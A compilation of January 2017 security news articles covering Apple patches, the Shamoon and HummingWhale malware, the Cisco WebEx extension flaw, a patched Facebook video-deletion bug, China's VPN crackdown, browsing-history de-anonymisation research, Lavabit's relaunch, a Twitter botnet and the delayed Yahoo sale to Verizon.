The newly released macOS Sierra 10.12.3 resolves 11 vulnerabilities in components such as apache_mod_php, Bluetooth, Graphics Drivers, Help Viewer, IOAudioFamily, Kernel, libarchive, and Vim. Most of the plugged issues could allow applications to execute arbitrary code, while others could allow malicious archives or web content to execute code. One of the bugs could allow an application to determine kernel memory layout.

Released on Monday, iOS 10.2.1 resolves 18 vulnerabilities in multiple components, including Auto Unlock, Contacts, Kernel, libarchive, WebKit, and Wi-Fi. WebKit was the most affected component, with no less than 12 flaws resolved in it, most of which were discovered by Google Project Zero researches.

Affecting iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation and later, the patched security holes included one where Auto Unlock may unlock when Apple Watch is off the user's wrist, unexpected application termination when processing a maliciously crafted contact card, arbitrary code execution with kernel privileges, data exfiltration, popups being opened by malicious websites, and the possibility to manipulate an activation-locked device to briefly present the home screen.

A total of 33 vulnerabilities were addressed with the release of watchOS 3.1.3, affecting all Apple Watch models. The issues were found in components such as Accounts, Audio, Auto Unlock, CoreFoundation, CoreGraphics, CoreMedia Playback, CoreText, Disk Images, FontParser, ICU, ImageIO, IOHIDFamily, IOKit, Kernel, libarchive, Profiles, Security, syslog, and WebKit.

The resolved vulnerabilities could be exploited for arbitrary code execution, to gain root privileges, to automatically trust certificates, to cause a denial of service, to overwrite existing files, to cause an unexpected system termination, to read kernel memory, to leak memory remotely. There’s also the issue where Auto Unlock could unlock when Apple Watch is off the user's wrist.

The release of tvOS 10.1.1 was meant to resolve 12 vulnerabilities in Kernel, libarchive, and Webkit. Affecting Apple TV (4th generation). These could result in an application executing arbitrary code with kernel privileges, arbitrary code execution when unpacking a malicious archive, and data exfiltration and arbitrary code execution when processing maliciously crafted web content.

No less than 12 bugs were patched in Safari 10.0.3, which is now available for download for OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.3. While one of these was an address bar spoofing, 11 were found in Webkit and could result in data exfiltration and arbitrary code execution.

Some of the Webkit issues were found to affect iCloud and iTunes for Windows too, and were addressed with the release of iCloud for Windows 6.1.1 and iTunes 12.5.5. The same four bugs affected both applications, resulting in arbitrary code execution.

Shamoon Attacks Possibly Aided by Greenbug Group

24.1.2017 Securityweek Virus
The stolen credentials used in the recent Shamoon attacks aimed at organizations in the Persian Gulf may have been supplied by a threat group tracked by Symantec as “Greenbug.”

Shamoon, aka Disttrack, is a disk-wiping malware that became widely known in 2012, when it damaged 35,000 computers belonging to petroleum and natural gas company Saudi Aramco. Shamoon 2, a more recent version of the threat, was recently used to target organizations in Saudi Arabia, including the country’s General Authority of Civil Aviation (GACA).

The first wave of Shamoon 2 attacks was launched on November 17 and a second wave on November 29. The attacks, which some have attributed to Iran, relied on the Disttrack malware to automatically start wiping infected systems at a specified time.

The malware was planted on targeted systems using stolen credentials, and security firm Symantec believes the information may have been obtained in a prior attack launched by a threat actor named Greenbug.

This cyber espionage group has used a remote access Trojan (RAT) called Ismdoor and various other tools in attacks aimed at organizations in the Middle East. The attackers targeted aviation, investment, government and education organizations in several countries, including Saudi Arabia, Iran, Iraq, Bahrain, Qatar, Kuwait and Turkey, and a Saudi company in Australia.

Greenbug has sent out fake business proposal emails to trick users into downloading malware onto their systems. The attackers delivered a RAR archive that stored a clean PDF and a compiled HTML help file (.chm) that contained the Ismdoor Trojan.

In order to avoid detection, the malware has been hidden in alternate data streams (ADS). Once executed, Ismdoor opens a backdoor and uses PowerShell for command and control (C&C) purposes. The Trojan is designed to install other pieces of malware, including ones capable of logging keystrokes and collecting browser, email and other sensitive data.

Symantec determined that Greenbug may have supplied credentials for the Shamoon attacks after detecting an Ismdoor infection on an administrator computer housed by one of the organizations targeted with Disttrack.

Researchers have not found any solid evidence linking the threat actors, but they pointed out that Ismdoor and other Greenbug tools became inactive just one day before the November 17 attacks.

Palo Alto Networks reported earlier this month that a variant of the Shamoon 2 malware is also designed to target virtualization products, likely in an effort to make recovery more difficult for attacked organizations.

Saudi Arabia has warned organizations to be on alert following a series of new attacks, Reuters reported on Monday. The country’s labor ministry, a chemicals firm and other companies have been allegedly hit.

Microsoft Unveils Windows Defender Security Center

24.1.2017 Securityweek Security
The upcoming Windows 10 Creators Update was designed to make available security protections easily accessible via a new experience called the Windows Defender Security Center, Microsoft says.

Last month, the tech giant shared some information on the security enhancements that the upcoming platform upgrade will bring. Microsoft is now providing more details on Windows Defender Security Center, a core feature of the operating system.

Since announcing Windows 10, Microsoft claimed that it was the most secure Windows version ever, but already proved that there was room for improvement with the release of Windows 10 Anniversary Update. One of the most important enhancements included mitigation techniques to stop the exploitation of new or undisclosed vulnerabilities.

The Windows Defender Security Center in Windows 10 Creators Update should make it easier for users to view and control the security protections the platform has to offer. The main functionality, Microsoft says, is to help users better understand and use the security features protecting them and their Windows 10 devices, even if they lack advanced knowledge on the matter.

As Rob Lefferts, Partner Director, Windows & Devices Group, Security & Enterprise, notes in a blog post, Windows Defender Security Center includes five “pillars” that users can take advantage of for controlling and keeping track of their device’s security, health and online safety experiences.

The first of these pillars is Virus & threat protection, where users can view information on their anti-virus protection, regardless of whether it is Windows Defender Antivirus or another application. For those who use Windows Defender Antivirus, scan results and threat history are available there. Those using a different anti-virus application will be able to launch it from there.

The second pillar is Device performance & health, where users can access a single view of Windows updates, drivers, battery life, and storage capacity. It also provides a Refresh Windows feature for those who want to get started with a clean install of Windows. The option maintains personal files and some Windows settings intact, but removes most apps for a fresh start that can offer performance improvements.

By going to Firewall & network protection, users can view information on the network connections and active Windows Firewall settings and can access links to network troubleshooting information. For those interested in adjusting SmartScreen settings for apps and browsers, App & browser control is the option to go to. It should prove useful to those looking to stay more informed and to remain safe online, as it warns them of potential malicious sites, downloads and unrecognized apps and files on the web.

Finally, there will be Family options, to link users to information about parental controls and to provide them with options for setting up good screen time habits and activity reports of kids’ online activity. It will also be useful for the management of controls for purchasing apps and games, as well as to view the health and safety of other family devices.

“Our goal with the new Windows Defender Security Center is to help you become more informed and make safety simple. It is equally important to us that you are protected by default and continuously protected – never giving the bad guys an opportunity to harm you. This new experience naturally supports customer choice in selecting an AV product,” Lefferts notes.

Since the upcoming experience is also meant to ensure that users are always protected, it will keep track of antivirus subscriptions and expiration dates and will automatically launch Windows Defender Antivirus when that happens. According to Lefferts, the new option should provide users with increased control over their PC, allowing them to choose the protection software and services that they like best.

“We believe the new Windows Defender Security Center lives up to these principles and we are committed to working with you, as well as security experts and organizations throughout the technology industry to create safer experiences for everyone with Windows 10,” Lefferts concluded.

Nasty Android Malware that Infected Millions Returns to Google Play Store
24.1.2017 thehackernews Android
HummingBad – an Android-based malware that infected over 10 million Android devices around the world last year and made its gang an estimated US$300,000 per month at its peak – has made a comeback.
Security researchers have discovered a new variant of the HummingBad malware hiding in more than 20 Android apps on Google Play Store.
The infected apps were already downloaded by over 12 Million unsuspecting users before the Google Security team removed them from the Play Store.
Dubbed HummingWhale by researchers at security firm Check Point, the new malware utilizes new, cutting-edge techniques that allow the nasty software to conduct Ad fraud better than ever before and generate revenue for its developers.
The Check Point researchers said the HummingWhale-infected apps had been published under the name of fake Chinese developers on the Play Store with common name structure, com.[name].camera, but with suspicious startup behaviors.
"It registered several events on boot, such as TIME_TICK, SCREEN_OFF and INSTALL_REFERRER which [were] dubious in that context," Check Point researchers said in a blog post published Monday.
HummingWhale Runs Malicious Apps in a Virtual Machine

The HummingWhale malware is tricky than HummingBad, as it uses a disguised Android application package (APK) file that acts as a dropper which downloads and runs further apps on the victim's smartphone.
If the victim notices and closes its process, the APK file then drops itself into a virtual machine in an effort to make it harder to detect.
The dropper makes use of an Android plugin created by the popular Chinese security vendor Qihoo 360 to upload malicious apps to the virtual machine, allowing HummingWhale to further install other apps without having to elevate permissions, and disguises its malicious activity to get onto Google Play.
"This .apk operates as a dropper, used to download and execute additional apps, similar to the tactics employed by previous versions of HummingBad," researchers said. "However, this dropper went much further. It uses an Android plugin called DroidPlugin, originally developed by Qihoo 360, to upload fraudulent apps on a virtual machine."
HummingWhale Runs Without having to Root the Android Device
Thanks to the virtual machine (VM), the HummingWhale malware no longer needs to root Android devices unlike HummingBad and can install any number of malicious or fraudulent apps on the victim's devices without overloading their smartphones.
Once the victim gets infected, the command and control (C&C) server send fake ads and malicious apps to the user, which runs in a VM, generating a fake referrer ID used to spoof unique users for ad fraud purposes and generate revenue.
Alike the original HummingBad, the purpose of HummingWhale is to make lots of money through ad fraud and fake app installations.
Besides all these malicious capabilities, the HummingWhale malware also tries to raise its reputation on Google Play Store using fraudulent ratings and comments, the tactic similar to the one utilized by the Gooligan malware.

A flaw in the Cisco WebEx Extension allows Remote Code Execution
24.1.2017 securityaffairs

Tavis Ormandy, a security expert at Google Project Zero, has discovered a critical remote code execution vulnerability in the Cisco WebEx browser extension.
Google Project Zero researcher Tavis Ormandy has discovered a critical remote code execution vulnerability in the Cisco WebEx browser extension. Cisco’s initial fix does not appear to be complete, which has led to Google and Mozilla temporarily removing the add-on from their stores.

Tavis Ormandy @taviso
There was a secret URL in WebEx that allowed any website to run arbitrary code. ¯\_(ツ)_/¯ https://bugs.chromium.org/p/project-zero/issues/detail?id=1096 …
10:23 PM - 23 Jan 2017
1,289 1,289 Retweets 937 937 likes
The popular Google Project Zero researcher Tavis Ormandy has discovered a critical code execution vulnerability in the Cisco WebEx browser extension. The flaw has a significant impact considering that the WebEx extension for Google Chrome has roughly 20 million active users.

The expert discovered that an attacker can trigger the vulnerability by using any URL that contains a “magic” pattern. The flaw could be exploited to remotely execute arbitrary code on the targeted WebEx user’s system by tricking victims into visiting a specially crafted website.

Cisco tried to fix the issue limiting the magic URL to https://*.webex.com and https://*.webex.com.cn domains but the Google researcher highlighted the it could still be exploited due to a potential cross-site scripting (XSS) flaw on webex.com.

“The extension works on any URL that contains the magic pattern “cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html”, which can be extracted from the extensions manifest. Note that the pattern can occur in an iframe, so there is not necessarily any user-visible indication of what is happening, visiting any website would be enough.” states the advisory published by Ormandy.

“The extension uses nativeMessaging, so this magic string is enough for any website to execute arbitrary code (!!).”

The expert discovered that even without the XSS an attacker can remotely execute arbitrary code on the target system if the victims click “OK” when they are prompted to allow a WebEx meeting to launch on the rogue website.

Ormandy published and PoC exploit and published a demo here for testing. A successful execution of the demo needs a working WebEx installation on the victim machine. Below the link to the PoC exploit:


CISCO WebEx flaw

Mozilla representatives also remarked that webex.com does not use HTTP Strict Transport Security (HSTS) and Content Security Policy (CSP).

“If I’m an adversary and I can find a single XSS on that domain, all I need to do at any point in the future is intercept an outgoing HTTP request from Chrome, insert a 302 redirect, and I have an instant RCE on who knows how many machines?” said April King, information security engineer at Mozilla.

Both Google and Mozilla have decided to remove the WebEx extension from their stores until Cisco releases will solve the issue.

A new loophole allowed an expert to delete any video on Facebook
24.1.2017 securityaffairs

Facebook has fixed a serious security bug that could have been exploited by hackers to delete any video shared by anyone on their wall.
A new bug was discovered in the Facebook platform by the security researcher Dan Melamed, the flaw could be exploited to delete any video shared by anyone on their wall.

Dan Melamed explained that a similar issue was discovered in June 2016 by the Indian security researcher Pranav Hivarekar who demonstrated that was able to delete any video by exploiting a security issue that exists in the recently introduced video comment feature.

The new but discovered by Melamed allowed him to delete any video on Facebook shared by anyone without having any permission or authentication. The expert also discovered that was possible to disable commenting on the video of your choice.

“Back in June of last year I discovered a critical vulnerability that allows me to remotely delete any video on Facebook. In addition, I also had the ability to disable commenting on any video. This allows a bad actor the ability to delete videos on Facebook without permission or authentication.” states the blog post published by Melamed.

The expert detailed the steps to exploit the vulnerability. He first created a public event on the Facebook page and uploaded a video on the Discussion part of the event.
The expert analyzed a POST request while uploading a video using the Fiddler debugging proxy and noticed the presence of a Video ID that could be manipulated. Melamed discovered that was possible to replace the Video ID value of the video he uploaded with Video ID value of any other video, in turn, the platform responded with a server error (i.e. “This content is no longer available,“).
Despite the error message the new video was successfully posted and displayed on the user’s wall.

Once posted the video, Melamed deleted the event post and eventually deleted the attached video, this operation triggered the removal of the video from Facebook and the wall of the victim.

“You will also notice in the drop down section that there is the option to “Turn off commenting.” This allows you to disable commenting on the video of your choice,” Melamed writes.

This simple sequence of action allowed the researcher to delete any video on Facebook, below a video PoC of the hack:

Melamed reported the vulnerability to Facebook which solved the problem in a couple of weeks earlier 2017. Facebook rewarded the bug hunter $10,000 under its bug bounty program.

China makes VPNs illegal to tighten its Great Firewall
24.1.2017 thehackernews Security
China is long known for its strict Internet censorship laws through the Great Firewall of China – China's Golden Shield project that employs a variety of tricks to censor Internet and block access to various foreign websites in the country by its government.
The Great Firewall has blocked some 171 out of the world's 1,000 top websites, including Google, Facebook, Twitter, Tumblr, Dropbox, and The Pirate Bay. Therefore, to thwart these restrictions and access these sites, hundreds of millions of Chinese citizens use virtual private networks (VPNs).
But now, the Chinese government has announced the mass shutdown of VPNs in the country, making it harder for internet users to bypass its Great Firewall, according to a report published by the South China Morning Post.
'Clean-Up' of China's Internet Connections
Calling it a "clean-up" of China's Internet connections, the Ministry of Industry and Information Technology said on Sunday that it had launched a 14-month-long crackdown on the use of unsupervised internet connections, including VPNs.
VPN services encrypt your Internet traffic and route that traffic through a distant connection so that web surfers in China can hide their location data and access websites that are usually restricted or censored by the country's so-called Great Firewall.
The new rules make it illegal to use or operate a local VPN service without government approval, and require all VPNs and leased cable lines operating in China have a license from the government.
According to the ministry, "all special cable and VPN services on the mainland needed to obtain prior government approval—a move making most VPN service providers in the country of 730 million Internet users illegal."
Moreover, every internet service provider (ISP), cloud services provider and VPN reseller are also required to carry out "self-inspections" for any illegal activity taking place on their servers.
VPN Ban will Remain until March 31, 2018
In a statement, the ministry said that the country's VPN and cloud computing market "has signs of disordered development that require urgent regulation and governance" and that the crackdown is designed to "strengthen cyberspace information security management."
The ban on VPNs and cable connections would begin immediately and will remain in place until March 31, 2018.
Besides the VPNs ban, China's IT ministry also said the government would be investigating ISPs, content delivery networks and internet data centers for failing to receive the right business permits and operating in areas that exceed their intended scope.
The move is the latest in a long series of attempts by the Chinese government to stop its citizens using VPNs and other filter-busting systems, which made them unable to have a tight grip on their people.

Cisco WebEx Extension Flaw Allows Code Execution

24.1.2017 Securityweek Vulnerebility
Google Project Zero researcher Tavis Ormandy has discovered a critical remote code execution vulnerability in the Cisco WebEx browser extension. Cisco’s initial fix does not appear to be complete, which has led to Google and Mozilla temporarily removing the add-on from their stores.

While analyzing the WebEx extension for Chrome, which has roughly 20 million active users, Ormandy noticed that it works on any URL that contains a “magic” pattern. This allows an attacker to execute arbitrary code on the targeted WebEx user’s system by getting them to access a specially crafted website.

Cisco has attempted to patch the security hole by limiting the magic URL to https://*.webex.com and https://*.webex.com.cn domains. Ormandy said the fix was acceptable, but pointed out that the vulnerability could still be exploited silently through a potential cross-site scripting (XSS) flaw on webex.com.

Furthermore, even without the XSS, an attacker can still execute arbitrary code as long as the victim clicks “OK” when they are prompted to allow a WebEx meeting to launch on the malicious website.

Mozilla representatives said they were unhappy with Cisco’s fix and pointed out that webex.com does not use HTTP Strict Transport Security (HSTS) and Content Security Policy (CSP).

“If I'm an adversary and I can find a single XSS on that domain, all I need to do at any point in the future is intercept an outgoing HTTP request from Chrome, insert a 302 redirect, and I have an instant RCE on who knows how many machines?” noted April King, information security engineer at Mozilla.

Others said they could still get Ormandy’s proof-of-concept (PoC) exploit to work even on the updated version.

As a result, both Google and Mozilla have decided to remove the WebEx extension from their stores until Cisco releases a proper fix.

“This is exactly the kind of ‘just visit this random website and now you have malware’ scenarios that we haven't seen in a while (on a large scale), and that we don't want to go back to,” said Filippo Valsorda, a researcher at CloudFlare.

Valsorda has published a blog post with advice on how to prevent these types of attacks in Chrome using browser profiles.

Researchers Link "de-identified" Browsing History to Social Media Accounts

24.1.2017 Securityweek Safety
Researchers Demonstrate How "de-identified" Web Browsing Histories Can be Linked to Social Media Accounts

While the use of cookies and other tracking mechanisms used to track computers is widespread and well understood, it is often believed that the data collected is effectively de-identified; that is, the cookies track the computer browser, not the person using the computer.

This is the message often promulgated by the advertising industry: tracking cookies allow targeted advertising without compromising personal privacy. Now new research from academics at Stanford and Princeton universities demonstrates that this need not be so.

In the new study 'De-anonymizing Web Browsing Data with Social Networks' (due to be presented at the 2017 World Wide Web Conference Perth, Australia, in April) the researchers show that de-identified web browsing histories can be linked to social media profiles using only publicly available data. Once the social media profile associated with a browsing pattern is known, the person is known.

The basic premise is that social media users are more likely to click on links posted by people they follow. This creates a distinctive pattern that persists in the browsing history. "An adversary can thus de-anonymize a given browsing history," states the report, "by finding the social media profile whose 'feed' shares the history's idiosyncratic characteristics."

The theory was tested against Twitter -- chosen because it is largely public, has an accessible API, and wraps its links in the t.co shortener. Assuming an 'adversary' has access to browsing histories, he can then easily deduce (through timing or referrer information) which links came from Twitter. The pattern of those referrals from Twitter can then be used to identify the user concerned by matching it with users' Twitter profile characteristics. The same approach could also be used against users with Facebook or Reddit accounts.

"Users may assume they are anonymous when they are browsing a news or a health website," comments says Arvind Narayanan, an assistant professor of computer science at Princeton and one of the authors of the research, "but our work adds to the list of ways in which tracking companies may be able to learn their identities."

The approach is not foolproof. Nevertheless, say the researchers, "given a history with 30 links originating from Twitter, we can deduce the corresponding Twitter profile more than 50 percent of the time." In fact, in a test involving 374 volunteers who submitted web browsing histories, the method was able to identify more than 70 percent of those users by comparing their web browsing data to hundreds of millions of public social media feeds.

"All the evidence we have seen piling up over the years showing the strong limits of data anonymization, including this study," comments Yves-Alexandre de Montjoye, an assistant professor at Imperial College London (not associated with the research), "really emphasizes the need to rethink our approach to privacy and data protection in the age of big data."

The problem goes beyond simple user privacy, since it could be used to target persons of interest. "The idea would be to look at something such as my Twitter account (as in who I'm following) and to determine what links I'm seeing," explains F-Secure security advisor Sean Sullivan. "And then, to find the 'User X' with the highest correlation between site visits and links seen. At which point, if I'm User X, I could be targeted by somebody who controls one of the sites visited."

At a purely 'commercial' level, this could be used to target individuals with high value goods. But it could also be used to find and target specific individuals prior to a network attack.

The researchers accept that their current methodology is not 100% accurate, but add an "adversary may fruitfully make use of other fingerprinting information available through URLs, such as UTM codes. Thus, the main lesson of our paper is qualitative: we present multiple lines of evidence that browsing histories may be linked to social media profiles, even at a scale of hundreds of millions of potential users."

Furthermore, it claims, "our attack has no universal mitigation outside of disabling public access to social media sites, an act that would undermine the value of these sites." It calls for "more research into privacy-preserving data mining of browsing histories."

China Cracks Down on Bids to Bypass Online Censorship

24.1.2017 Securityweek Safety
Beijing - China has announced a 14-month campaign to "clean up" internet service providers and crack down on devices such as virtual private networks (VPNs) used to evade strict censorship.

The ruling Communist party oversees a vast apparatus designed to censor online content deemed politically sensitive, while blocking some Western websites and the services of internet giants including Facebook, Twitter and Google.

It passed a controversial cybersecurity bill last November, tightening restrictions on online freedom of speech and imposing new rules on service providers.

But companies and individuals often use VPNs to access the unfettered internet beyond China's "Great Firewall".

Telecom and internet service providers will no longer be allowed to set up or rent special lines such as VPNs without official approval, the ministry of industry and information technology said Sunday.

Its "clean up" campaign would last through March 2018, it said in a statement on its website.

The announcement comes days after President Xi Jinping extolled globalisation and denounced protectionism in a keynote speech at the World Economic Forum in Davos, where he insisted that China was committed to "opening up".

China's internet access services market has grown rapidly, and the "first signs of disorderly development are also appearing, creating an urgent need for regulation", the statement said.

The new rules were needed to "strengthen internet information security management", it added.

IT expert Li Yi told the Global Times newspaper, which often takes a nationalistic tone, the new regulations were "extremely important".

While some multinationals such as Microsoft needed VPNs to communicate with overseas headquarters, other companies and individuals "browse overseas internet pages out of illegal motivations", Li said.

A 2015 report by US think tank Freedom House found that China had the most restrictive Internet policies of 65 countries it studied, ranking below Iran and Syria.

China is home to the world's largest number of internet users, which totaled 731 million as of December, the government-linked China Internet Network Information Center said Sunday.

Millions Download HummingBad Variant via Google Play

24.1.2017 Securityweek Android
A newly discovered variant of the HummingBad Android malware has been downloaded millions of times after infecting 20 applications in Google Play, Check Point security researchers warn.

Discovered in early 2016, HummingBad already proved one of the most prolific Android malware families out there, accounting for over 72% of attacks in the first half of the year.

In a report published last July, Check Point suggested that around 10 million Android devices might have been compromised by HummingBad and that its rootkit capabilities allowed attackers take full control over the infected devices. The researchers also said that Yingmob, the group behind the malware, might have compromised over 85 million devices.

Dubbed HummingWhale, the newly discovered variant is said to include cutting edge techniques that allow it to perform its nefarious activities (ad fraud) better than before.

While HummingBad was spreading mainly through third-party app stores, the HummingWhale variant made its way into Google Play and infected 20 apps, all of which have been already removed by Google. The main giveaway feature, the researchers say was a 1.3MB encrypted file called ‘assets/group.png’ also found in some later HummingBad samples that were masquerading as an app called “file-explorer.”

Offending apps were found to register several events on boot, such as TIME_TICK, SCREEN_OFF and INSTALL_REFERRER, as well as to feature a common name structure – com.XXXXXXX.camera (e.g. com.bird.sky.whale.camera, com.color.rainbow.camera, com.fishing.when.orangecamera). Apps outside of the camera family were also identified.

The HummingWhale samples were also observed registering to certain events and packing some identical strings in their code and certificates when compared to the previous HummingBad variants. HummingWhale was also observed being promoted by several new HummingBad samples, Check Point says.

The new malware variant, researchers say, is heavily packed and has its main payload in the ‘group.png’ file, which is actually an .apk that operates as a dropper. This executable file can download additional apps, a functionality observed in previous versions of HummingBad as well. The new dropper, however, uses the DroidPlugin Android plugin to upload fraudulent apps on a virtual machine.

“First, the Command and Control server (C&C) provides fake ads and apps to the installed malware, which presents them to the user. Once the user tries to close the ad, the app, which was already downloaded by the malware, is uploaded to the virtual machine and run as if it is a real device. This action generates the fake referrer id, which the malware uses to generate revenues for the perpetrators,” the security researchers explain.

By using this method, the cybercriminals ensure that the malware installs apps without gaining elevated permissions first, and that the malicious activity is disguised, thus allowing the malware to infiltrate Google Play. What’s more, the embedded rootkit in the previous HummingBad variant is no longer needed, since the same results are achieved without it. On top of that, the malware can now install an infinite number of fraudulent apps without overloading the device.

“HummingWhale also conducted further malicious activities, like displaying illegitimate ads on a device, and hiding the original app after installation, a trait which was noticed by several users. As can be seen in the image below, HummingWhale also tries to raise its reputation in Google Play using fraudulent ratings and comments, similar to the Gooligan and CallJam malware before it,” the security researchers say.

Lavabit Email Service Returns with New Encryption Platform

24.1.2017 Securityweek Safety
Lavabit, the secure email service that shut down in 2013 after the NSA requested access to Eduard Snowden's email account, is recommencing operations on a new secure end-to-end communications platform, Lavabit owner Ladar Levison announced on Friday.

In August 2013, the service was suspended after the NSA requested its Secure Sockets Layer (SSL) private keys to access the email account of its users. The NSA was reportedly interested in Snowden’s account at the time, but Lavabit suggested that, with the SSL key in its hands, the US government would have been able to access any account.

Lavabit’s closing at the time prompted other online services to take a similar route, including Silent Circle, which shut down its Silent Mail service “to prevent spying,” and Groklaw, a technology news site focused on legal issues. Several months later, Silent Circle and Lavabit formed the Dark Mail Alliance, focused on offering the “next-generation of private and secure email.”

The relaunch of Lavabit’s email service, Levison says, isn’t meant only to continue sustaining online freedom, justice, and liberty, but also to address some of the main issues that email services today face. He also points out that the reopening builds on the Dark Internet Mail Environment (DIME), open source secure end-to-end communications platform for asynchronous messaging across the Internet.

“Today, we start a new freedom journey and inaugurate the next-generation of email privacy and security,” Levison notes on the Lavabit website.

DIME was created with Kickstarter funding, which also helped Levison come up with Magma, an associated DIME-capable free and open source mail server. Released on Friday together with Magma, the end-to-end encrypted global standard was designed to offer multiple modes of security (Trustful, Cautious, and Paranoid), and to address security problems so far have neglected.

The platform was designed as an evolution of OpenPGP and S/MIME, which don’t provide automatic encryption and don’t protect metadata. DIME, on the other hand, encrypts all facets of an email transmission (body, metadata and transport layer), thus aiming to deliver the greatest protection possible without sacrificing functionality.

“DIME is the only automated, federated, encryption standard designed to work with different service providers while minimizing the leakage of metadata without a centralized authority. DIME is end-to-end secure, yet flexible enough to allow users to continue using their email without a Ph.D. in cryptology,” Levison says.

Users can rely on the server to handle all privacy issues, meaning they would have to “trust” the server (Trustful mode), can set it to only store and synchronize encrypted data, including encrypted copies of a user’s private keys and encrypted copies of messages (Cautious mode), or can place a minimum amount of trust in the server, denying it access to private keys (encrypted or decrypted), but losing functionality, as webmail access won’t be available (Paranoid mode).

The service is available for existing users to regain access to their accounts in “Trustful” mode and update their credentials to the new DIME standard, as well as for new users to pre-register for an account.

Lavabit also made the free, open source library, and the associated command line tools for creating and handling the new DIME standard available for everyone, and says that any domain admin can deploy Magma or implement their own encrypted DIME compatible server. Clients for Windows, Mac OS X/iOS, and Linux/Android are also expected to be released.

“Today, the democratic power we transfer to keep identities safe is our own. With your continued patronage, we will restore privacy and make end-to-end encryption an automatic, ubiquitous and open source reality,” Levison concluded.

In 2014, Snowden’s revelations about widespread online surveillance resulted in a push to encrypt email and keep messages free from the government, and the move regained momentum last year, after Apple decided not to provide the FBI with assistance to access San Bernardino’s iPhone, claiming that it was actually asking for a backdoor to all iPhones out there.

'Star Wars' Botnet Has 350,000 Twitter Bots

24.1.2017 Securityweek BotNet
A newly discovered Twitter botnet has been lying dormant for over three years, although it includes more than 350,000 bot accounts, researchers at the University College London have discovered.

Discovered by Juan Echeverria and Shi Zhou, the botnet stands out because all of the bots forming it present several specific characteristics, including the fact that all of them tweeted quotes from Star Wars. In a recently published paper (PDF) called The `Star Wars' botnet with >350k Twitter bots, the researchers also explain that all of the bots used Twitter for Windows Phone to post the messages.

Focused mainly on discussing the manner in which Twitter botnets can be discovered, the paper reveals other characteristics of these bots as well: they all used fake locations within a specific set of geographical coordinates (in Europe and North America), none had more than 11 tweets, more than 10 followers or more than 31 friends, none retweeted or mentioned another user, and all of their IDs were confined to a narrow range.

The researchers also discovered that the bots’ tweets included only the Star Wars quotations, along with either hashtags that are usually associated with earning followers, or the hash symbol # inserted in front of a randomly chosen word. After manually identifying 3,244 such bots, the researchers used machine learning to automatically detect all of the bots featuring the above characteristics (thus part of the Star Wars botnet).

For that, they looked into the content of the tweets created by these bots and a data set of 9,000 real users, and came up with a set of 80,000 words, including 30,000 most frequent words tweeted by the bots, and 50,000 words tweeted by the real users. By creating word count vectors and training the classifier (a machine learning technique) with the vectors, the researchers achieved over 99% precision in the detection of the bots.

The method revealed a total of 356,957 bots that were created between June 20 and July 14, 2013, all of which started tweeting immediately after creation, for a total of 150,000 tweets per day. However, all bots went silent on July 14, 2013, and the creation of new bots also stopped that day, suggesting that they were controlled by a botmaster, the researchers say.

Discussing the manner in which the botnet remained undetected for so long, the paper notes that “the Star Wars bots were deliberately designed to keep a low profile.” The bots tweeted a few times, did nothing special, only tweeted random quotations from novels to use real human's language, used normal profiles (some even had pictures), and included no URLs in their tweets (in addition to never replying or mentioning users and to following only a small number of friends).

The paper notes that the botnet was discovered because tweets were location-tagged, and the used locations created an anomaly that only a human eye could see. While the discovery of the Star Wars bots was “real luck,” the researchers say that it inspired them to look for other similar botnets, and that an even larger one, with over 500,000 bots, was spotted.

“However, the process of discovering these botnets is unique. It is unlikely that we can repeat our luck, because future botnets could easily be programmed to avoid the design `mistakes' of the Star Wars bots. For example bots do not need to tag their locations at all, because most users do not; and bots can quote from all sorts of sources, including other series of books, magazines, web pages, or even social media postings,” the paper reads.

Although the Star Wars bots stayed inactive for more than three years, they shouldn’t be considered harmless, because the botmaster likely still has control over them, the researchers say. Thus, these bots can be easily used for spam, promotion of fake topics, opinion manipulation, astroturfing attacks, fake followers and sample contamination.

What’s more, because these bots are so old and managed to avoid detection for so long, they are believed to be more valuable to cybercriminals. Pre-aged bots are likely to be sold at premium rates on black markets, and “the Star Wars bots are perfectly suited to be sold,” the researchers say. In fact, because 15,000 Star Wars bots have been following a small number of Twitter users outside the botnet, it’s possible they were already sold as fake followers.

“One of the major challenges of research on Twitter bots is the lack of ground truth data,” the security researchers note, calling for new detection methods to find other hidden bots, as well as future bots that are likely to look more and more like normal users. “We argue that more research is needed to fully understand the potential security risks that a large, hidden botnet can pose to the Twitter environment, and research in general,” the researchers say.

Sale of Core Yahoo Assets to Verizon Delayed

24.1.2017 Securityweek IT
Yahoo Sale to Verizon Delayed

San Francisco - Yahoo said Monday its $4.8 billion deal to sell its core internet assets to US telecom titan Verizon has been delayed several months.

The closing originally set for this quarter has been pushed into next quarter due to "work required to meet closing conditions," the California online pioneer said in a statement, adding that it was "working expeditiously to close the transaction as soon as practicable."

The news came in an earnings release showing Yahoo swung to a profit of $162 million in the final three months of last year.

The deal with Verizon, which would end Yahoo's run of more than 20 years as an independent company, has been thrown into doubt following disclosures of two huge data breaches.

Yahoo said Monday it is hustling to ramp up security as it grapples with the aftermath of epic hacks.

"Our top priority continues to be enhancing security for our users," Yahoo chief executive Marissa Mayer said.

She added that "approximately 90 percent of our daily active users have already taken or do not need to take remedial action to protect their accounts, and we're aggressively continuing to drive this number up."

Yahoo boasted having more than a billion users monthly in 2016, with more than 650 million of those people connecting from mobile devices.

Hack aftershocks

The US Securities and Exchange Commission has opened an investigation into whether Yahoo should have informed investors sooner about two major data breaches, the Wall Street Journal reported Sunday, citing people familiar with the matter.

US law requires companies that fall victim to such hacks disclose them as soon as they are deemed to affect stock prices.

Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting over a billion users.

The SEC's investigation is focusing on why it took Yahoo several years to reveal the 2013 and 2014 attacks.

The data breaches have been a major embarrassment for a former internet star that has failed to keep up with Google, Facebook and other rising stars.

The cyber attacks, and how notifying users was handled, has also raised concerns by investors that Verizon may seek to pay a lower price for Yahoo or even back out of the deal.

The earnings report showed Yahoo swung to profit a year after a massive $4.4 billion loss in the same period a year earlier, resulting from a large writedown on the value of its holdings.

Revenue in the fourth quarter rose to $1.47 billion from $1.27 billion a year earlier.

Yahoo reported a loss of $214 million for the full year on revenue that inched up to $5.2 billion from $5 billion in 2015, according to the earnings report.

Mayer has been driving a shift to mobile, video, social, and native advertising offerings at Yahoo, and revenue in those areas - which she dubbed '"avens," continued to climb.

